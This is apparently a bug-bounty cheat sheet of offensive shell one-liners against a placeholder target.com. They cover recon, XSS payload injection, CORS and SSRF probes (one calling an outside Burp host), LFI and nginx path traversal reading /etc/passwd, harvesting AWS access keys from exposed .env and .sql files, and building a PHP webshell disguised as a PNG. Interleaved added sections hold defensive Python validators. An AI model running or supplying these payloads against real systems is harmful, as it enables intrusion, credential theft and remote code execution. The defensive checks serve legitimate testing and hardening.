
One liners

Extracting URLs from page source

curl "https://target.com/" | grep -oP "(https?://|www\.)[^\s\"'<>]*"

Subdomain discovery

curl -s 'https://crt.sh/?q=%.target.com&output=json' | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
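The crt.sh one-liner above relies on jq and sed; the same normalisation, written out so the edge cases are visible, is shown below as an added example (not part of the original page). A single certificate record's name_value may hold several names separated by newlines, wildcards must be stripped, case must be folded, and names outside the zone you asked for should be dropped. The sample JSON is constructed to look like a crt.sh response; the zone name is a placeholder.

```python
import json
import re
from typing import List

# Constructed sample shaped like a crt.sh "output=json" response: one record per
# certificate, where name_value can list several names separated by "\n".
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "www.target.com\ntarget.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "*.dev.target.com"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "name_value": "mail.target.com\nwww.target.com"},
    {"issuer_name": "C=US, O=Example CA",
     "name_value": "TARGET.COM\nunrelated.example"},
])

# RFC 1123 style hostname: labels of letters, digits and hyphens, joined by dots.
HOSTNAME_RE = re.compile(
    r"^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$"
)


def parse_crtsh(raw_json: str, zone: str) -> List[str]:
    """Return the sorted, de-duplicated hostnames under `zone` found in a
    crt.sh JSON response (same result the jq | sed | sort -u pipeline aims for)."""
    zone = zone.lower().strip(".")
    found = set()
    for record in json.loads(raw_json):
        # one record may carry several SAN entries separated by newlines
        for name in record.get("name_value", "").split("\n"):
            name = name.strip().lower()
            if name.startswith("*."):
                name = name[2:]  # a wildcard cert tells us the parent zone exists
            if not name or not HOSTNAME_RE.match(name):
                continue  # skip empty or malformed entries
            if name == zone or name.endswith("." + zone):
                found.add(name)
    return sorted(found)


if __name__ == "__main__":
    for host in parse_crtsh(SAMPLE_CRTSH_JSON, "target.com"):
        print(host)
```

Run against a live response with `curl -s 'https://crt.sh/?q=%.target.com&output=json'` piped into the script instead of the constructed sample; the zone filter matters because crt.sh substring searches can return names from other domains.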

Endpoint discovery

# Angular API endpoints
curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u

Endpoint filtering

cat endpoints.txt | grep -i "admin\|login\|staging\|dashboard\|Admin\|\.asp\|\.php\|\.json\|cgi\|\.xml\|\.sql\|\.db\|\.rb\|\.py\|\.sh\|\.yml\|\.yaml\|\.ini\|\.md\|\.js\|\.cfg\|env\|\.xls\|\.pdf\|\.docx" | anew interesting_path.txt

Use whichever keywords you want in the grep pattern.

Screenshots of an IP range

IP="192.168.0"; for p in '80' '443'; do for i in $(seq 0 5); do TAKE_SS=$(cutycapt --url=$IP.$i:$p --out=$IP.$i:$p.png); done; done

Target-specific wordlist generator

echo "target.com" | subfinder -silent | httpx | hakrawler | sed $'s/[./?=:&#]/\\\n/g' | anew wordlist.txt

XSS scanner

echo "target.com" | waybackurls | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq

gau target.com | uro | grep '?' | sed -e 's/:80//g' -e 's/:443//g' -e 's/http:/https:/g' -e 's/=/=Sirat%22%3E%3CH1%3Exss123/g' | httpx -silent -ms '<h1>xss123'

echo "target.com" | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

cat targets.txt | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silent --skip-mining-dom --ignore-return 302,404,403

waybackurls target.com | grep "=" | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq | egrep -v 'Not'

CORS scanner

assetfinder target.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] \033[0m{}"' 2>/dev/null
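The one-liner above only greps for the probe origin being echoed back. As an added example (not from the original page), the function below classifies what a response's CORS headers actually allow, which is what decides the risk: a reflected origin is only serious when Access-Control-Allow-Credentials is also true, a bare wildcard never carries credentials in browsers, and "null" is allowed by some servers for sandboxed or file origins. The raw response text is constructed to mimic `curl -I` output; the origins are placeholders.

```python
from typing import Dict

# Constructed sample of a `curl -I` style response that reflects the probe origin
# and also allows credentials: the combination the scan is really looking for.
SAMPLE_RAW_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json\r\n"
    "Access-Control-Allow-Origin: https://evil.example\r\n"
    "Access-Control-Allow-Credentials: true\r\n"
    "\r\n"
)


def parse_raw_headers(raw: str) -> Dict[str, str]:
    """Turn a raw HTTP header block (status line first) into a name -> value dict."""
    headers: Dict[str, str] = {}
    for line in raw.splitlines()[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip()] = value.strip()
    return headers


def classify_cors(probe_origin: str, response_headers: Dict[str, str]) -> str:
    """Classify the CORS policy a response expresses for the Origin we sent.

    Returns one of:
      no-cors                     no ACAO header at all (browsers block cross-origin reads)
      wildcard                    ACAO: * without credentials (public data only)
      wildcard-with-credentials   ACAO: * plus credentials=true (browsers reject it, but it is a misconfiguration)
      null-origin-allowed         ACAO: null (reachable from sandboxed iframes / data: URLs)
      reflected                   our arbitrary origin came back, no credentials
      reflected-with-credentials  our arbitrary origin came back with credentials: the high-risk case
      restricted                  some other fixed origin is allowed
    """
    # header names are case-insensitive, so normalise before lookup
    h = {k.lower(): v.strip() for k, v in response_headers.items()}
    acao = h.get("access-control-allow-origin")
    credentials = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no-cors"
    if acao == "*":
        return "wildcard-with-credentials" if credentials else "wildcard"
    if acao == "null":
        return "null-origin-allowed"
    if acao.lower() == probe_origin.lower():
        return "reflected-with-credentials" if credentials else "reflected"
    return "restricted"


if __name__ == "__main__":
    print(classify_cors("https://evil.example", parse_raw_headers(SAMPLE_RAW_RESPONSE)))
```

A single probe cannot tell "reflected" apart from "this origin is on the allowlist"; probing with two different origins you control and seeing both come back is the confirmation. On the fixing side, the server should compare the Origin against an explicit allowlist and send credentials=true only for those entries.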

SSRF scanner

#pip3 install queryswap

echo "domain" | hakrawler -d 5 | grep "=" |python3 -m qs http%3a%2f%2fmy.burp.net

Open redirect

export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I% -P 25 sh -c 'curl -ls "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

echo "https://target.com" | gau | grep =http | php -r "echo urldecode(file_get_contents('php://stdin'));"

LFI

gau target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Nginx path traversal

cat urls.txt | httpx -nc -t 250 -p 80,443,8080,8443,4443,8888,8081 -path "///////../../../etc/passwd" -mr "root:x" -silent | anew output.txt
httpx -l urls.txt -path "///////../../../../../etc/passwd" -sc -mc 200 -mr 'root:'
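Both commands above test whether a server resolves a path such as ///////../../../etc/passwd outside its document root. As an added example (not from the original page), here is the mapping logic a server or upload handler needs so that such requests cannot escape: decode once, require the location prefix to end at a path separator (so "/static../x" is not treated as inside "/static", the classic alias off-by-slash), normalise, and then check the result is still under the directory. The prefix, alias directory and request paths are constructed placeholders.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote


def map_location(prefix: str, alias_dir: str, request_path: str) -> Optional[str]:
    """Map a request path under `prefix` (e.g. "/static") onto a file under
    `alias_dir`. Returns None when the request is outside the prefix or the
    normalised result would escape alias_dir."""
    prefix = "/" + prefix.strip("/")
    alias_dir = posixpath.normpath(alias_dir)
    # decode percent-encoding exactly once; decoding again would re-open %252e tricks
    path = unquote(request_path)
    # the prefix must be the whole first segment: "/static../etc/passwd" does not
    # start with "/static/", so it is rejected instead of becoming "<alias>/../etc/passwd"
    if path != prefix and not path.startswith(prefix + "/"):
        return None
    remainder = path[len(prefix):].lstrip("/")  # collapses any run of leading slashes
    if not remainder:
        return alias_dir
    candidate = posixpath.normpath(posixpath.join(alias_dir, remainder))
    # containment check after normalisation: ".." segments have been resolved by now
    if candidate != alias_dir and not candidate.startswith(alias_dir + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # constructed requests against a location "/static" aliased to /var/www/static/
    for req in ["/static/css/app.css",
                "/static///////../../../etc/passwd",
                "/static../etc/passwd",
                "/static/%2e%2e/%2e%2e/secret.txt"]:
        print(req, "->", map_location("/static", "/var/www/static/", req))
```

The check works on the normalised string; a server that serves real files should additionally resolve symlinks (os.path.realpath) before the containment test, otherwise a symlink inside the directory can point back outside it.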

CNAME records

cat live-domains.txt | while read domain; do dig "$domain"; done | grep CNAME | tee -a CNAME_Records

Finding IAM user access keys (AWS)

echo target.com | subfinder -silent | httpx -silent -path ".env","mysql_history","echo $(echo $(</dev/stdin) | cut -d "." -f2).sql" -mc 200 -ports 80,443,8080,8443 | grep -E -i "AKIA[A-Z0-9]{16}"

RCE in a png file

# JPEG signature (FF D8 FF E0) followed by the PHP payload; -e is needed so the \x escapes are written as bytes
echo -ne '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.png

# First four bytes of the PNG signature followed by the PHP payload
echo -ne '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png
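Both files above pass a naive magic-bytes check because only the first four bytes are inspected. As an added example (not from the original page), the validator below shows what an upload handler has to check to reject them: the full 8-byte PNG signature, IHDR as the first chunk, a correct CRC-32 on every chunk, and IEND as the last chunk with nothing after it. The minimal PNG and the fake file are constructed inline; the fake uses a harmless placeholder body rather than the page's payload.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"  # all 8 bytes, not just the first 4


def is_well_formed_png(data: bytes) -> bool:
    """Return True only if `data` is a structurally valid PNG."""
    if not data.startswith(PNG_SIGNATURE):
        return False
    pos = len(PNG_SIGNATURE)
    first_chunk = True
    while True:
        if pos + 8 > len(data):
            return False  # truncated before a full chunk header (or no IEND at all)
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body_start = pos + 8
        body_end = body_start + length
        if body_end + 4 > len(data):
            return False  # declared length runs past the buffer
        (crc,) = struct.unpack(">I", data[body_end:body_end + 4])
        if (zlib.crc32(ctype + data[body_start:body_end]) & 0xFFFFFFFF) != crc:
            return False  # corrupted or hand-crafted chunk
        if first_chunk and ctype != b"IHDR":
            return False  # IHDR must come first
        first_chunk = False
        pos = body_end + 4
        if ctype == b"IEND":
            return pos == len(data)  # anything after IEND is not part of the image


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Build one PNG chunk: length, type, body, CRC-32 over type+body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """Constructed 1x1 8-bit grayscale PNG that satisfies the spec."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, depth, colour type, ...
    scanline = b"\x00\x00"  # filter byte 0 followed by one pixel
    return (PNG_SIGNATURE
            + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline))
            + _chunk(b"IEND", b""))


# Constructed stand-in for the page's shell.png: 4 signature bytes then script text.
FAKE_PNG = b"\x89\x50\x4E\x47" + b"<?php echo 'not an image'; ?>."


if __name__ == "__main__":
    print("real png:", is_well_formed_png(minimal_png()))
    print("fake png:", is_well_formed_png(FAKE_PNG))
```

Structural validity is a filter, not a guarantee: a tEXt or zTXt chunk can still carry arbitrary bytes, so the stronger mitigations are to re-encode uploads through an image library and to serve the upload directory with script execution disabled.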
